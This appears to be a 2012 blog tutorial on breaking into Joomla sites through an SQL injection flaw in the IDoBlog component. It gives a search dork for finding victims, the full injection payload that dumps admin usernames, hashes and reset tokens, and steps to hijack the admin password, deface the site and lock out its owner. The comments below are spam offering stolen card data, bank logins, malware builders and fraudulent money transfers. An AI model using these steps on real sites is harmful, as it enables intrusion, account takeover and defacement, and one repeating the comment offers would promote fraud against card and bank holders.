Pages

Monday, October 1, 2012

HOW TO HACK JOOMLA!


Level: NFN (Not For Noobs)

Tools required:SQL-i Knowledge
reiluke SQLiHelper 2.7
Joomla! Query Knowledge

DISCLAIMER:
THIS TUTORIAL IS FOR EDUCATION PURPOSE ONLY!!! YOU MAY NOT READ THIS TUTORIAL IF YOU DON'T UNDERSTAND AND AGREE TO THIS DISCLAIMER. ME AS AUTHOR OF THIS TUTORIAL NOT BE HELD RESPONSIBLE FOR THE MISUSE OF THE INFORMATION CONTAINED WITHIN THIS TUTORIAL. IF YOU ABUSE THIS TUTORIAL FOR ILLEGAL PURPOSES I WILL NOT BE HELD RESPONSIBLE FOR ANY ACTION THAT MAY BE TAKEN AGAINST YOU AS A RESULT OF YOUR MISUSE.

NOTE:
USE ANONYMOUS PROXY!!!

Introduction

Joomla! as Stable-Full Package is probably unhackable and If someone tells that HACKED Joomla, talking rubbish!!!
But people still hacked sites that use Joomla as Content Management System?!? 
Joomla is made of components and modules and there are some developers apart from official team that offer their solutions to improve Joomla. That components and modules mede by that other developers are weak spots!

I hacked site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't tell that I hacked Joomla!

Finding Exploit And Target

Those two steps could go in different order, depend what you find first target or exploit...

Google dork: inurl:"option=com_idoblog"
Comes up with results for about 140,000 pages

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

At inj3ct0r.com search for: com_idoblog
Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

==
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
==

index.php?option=com_idoblog&task=profile&Itemid=1 337&userid=62+union+select+1,concat_ws(0x3a,userna me,password),3,4,5,6,7,8,9,10,​11,12,13,14,15,16+f rom+jos_users--

Exploit can be separated in two parts:

Part I
index.php?option=com_idoblog&task=profile&Itemid=1 337&userid=62
This part opening blog Admin page and if Admin page don't exist, exploit won't worked (not completely confirmed)

Part II
+union+select+1,concat_ws(0x3a,username,password), 3,4,5,6,7,8,9,10,11,12,13,14,1​5,16+from+jos_users--
This part looking for username and password from jos_users table

Testing Vulnerability

Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick 'Load images automatically'


Go to:
Code:

http://www.site.com/index.php?option...blog&Itemid=22

Site load normally...

Go to:
Code:

http://www.site.com/index.php?option...1337&userid=62

Site content blog Profile Admin

Go to:
Code:

http://www.site.com/index.php?option...ion+select+1--

Site is vulnerable

Inject Target

Open reiluke SQLiHelper 2.7
In Target copy Code:

http://www.site.com/index.php?option...1337&userid=62

and click on Inject
Follow standard steps until you find Column Name, as a result we have 

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

Notice that exploit from inj3ct0r wouldn't work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data

Let Dump username, email, password from Column Name jos153_users. Click on Dump Now

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk05 6eewFWM13vEThJI


Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time...


The easiest way to hack is to reset Admin password!

Admin Password Reset

Go to:
Code:

http://www.site.com/index.php?option...ser&view=reset

This is standard Joomla! query for password reset request

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

Forgot your Password? page will load.
In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.
If you find right admin email, Confirm your account. page will load, asking for Token:

Finding Token

To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

username: admin
activation: 5482dd177624761a290224270fa55f1d


5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

If you done everything ok, Rest your Password page will load. Enter your new password...

After that go to:
Code:

http://www.site.com/administrator/

Standard Joomla portal content management system

Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click ApplySave and you are done!!!

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

Make this tutorial alive!!!


credit to K1NG0FH@CK 

3 comments:

  1. This blog is so nice to me. I will keep on coming here again and again. Visit my link as well..
    carding forum

    ReplyDelete
    Replies
    1. Hello world
      I teach hacking andriod apk virus - windows Hacking - web server hacking -
      Reseller :- Hacking Tools & Hacking services, Also Teach Hacking Methods Via teem weaver or Anydesk,
      Each Method Take minimum 1 hour to learn with vedio Tutorial And Hacking Tools ,

      How to Make Money hacking tools,

      - Spamming & Tools ,
      - Carding & Tools ,
      - Virus with control panal and Spy bot files,
      - Virus With Builder And Crypter ,
      - Scanners with Bruters ,
      - Crypters with Doc Exploits ,pdf Exploits ,TExtfile Exploits ,
      - PHP Exploits with shell and mailer
      - OTP verications Bypass with Bulletproof Scam-page and Otp control
      - Company Ceo or cfo leads Any country
      - Rat virus with builder
      - Cookies Stealers and Builder
      - keyloger and builder
      - Credit card Scam-pages
      - Bank login Scam-pages
      - debit card topup scam page
      - donation scam-page
      - dhl login and tracking scam-page
      - fedax login and tracking scam-page
      - Shipping Tools

      Place & Ground
      learners you will pay cheap $ for demo Tools & Method

      Business grounds

      Credit card Low Interest Services,

      - Credit card with Fullz Information - Minimum Investment 150$ - With 50k Credit limit And balance
      - Debit Card Topup AS per Card limit - Minimum Investment 200$ - With 8000$ balance
      - Dating scam Fresh male female Logins - Minimum Investment 80$ - Dating Login upto 30

      -----------------
      ABOUT US :
      Icq :-675452902
      Skype: rushr00t000
      email me:- hackitbackd00r@gmail.com

      Delete
  2. Selling good and fresh cvv fullz

    track 1 and 2 with pin

    bank login

    bank transfer

    writing cheques

    transfer to cc ...

    Sell Fresh CVV - Western Union Transfer - Bank Login - Card Dumps - Paypal - Ship

    Fresh Cards, Selling Dumps, Cvvs, Fullz

    Tickets,Hotels,Credit card topup...Paypal transfer, Mailer,Smtp,western union login,

    Book Flight Online

    SELL CVV GOOD And HACK BIG CVV GOOD Credit Card

    Fresh Cards. Selling Dumps, Cvvs, Fullz.Tickets,Hotels,Credit cards


    Sell Cvv(cc) - Wu Transfer - Card Dumps - Bank login/paypal

    And many more other hacking services

    contact me : hackerw169@gmail.com
    ICQ: 699 396 818


    - I have account paypal with good balance

    - I hope u good customers and will be long-term cooperation


    Prices Western Union Online Transfer


    -Transfer(Eu,Uk,Asia,Canada,Us,France,Germany,Italy and very

    easy to do African)

    - 200$ = 1500$ (MTCN and sender name + country sender)

    - 350$ = 4000$ (MTCN and sender name + country sender)

    - 500$ = 6000$ (MTCN and sender name + country sender)

    - 600$ = 8000$ (MTCN and sender name + country sender)

    Then i will do transfer's for you, After about 30 mins you'll have

    MTCN and sender name + country sender


    - Dumps prices

    - Tracks 1&2 US = 85$ per 1

    - Tracks 1&2 UK = 100$ per 1

    - Tracks 1&2 CA / AU = 110$ per 1

    - Tracks 1&2 EU = 120$ per 1


    Bank Logins Prices US UK CA AU EU


    - Bank Us : ( HALIFAX,BOA,CHASE,Wells Fargo...)

    . Balance 5000$ = 250$

    . Balance 8000$ = 400$

    . Balance 12000$ = 600$

    . Balance 15000$ = 800$

    . Balance 20000$ = 1000$

    - Bank UK : ( LLOYDS TSB,BARCLAYS,Standard Chartered,HSBC...)

    . Balance 5000 GBP = 300 GBP

    . Balance 12000 GBP = 600 GBP

    . Balance 16000 GBP = 700 GBP

    . Balance 20000 GBP = 1000 GBP

    . Balance 30000 GBP = 1200 GBP


    contact me : hackerw169@gmail.com
    ICQ: 699 396 818

    ReplyDelete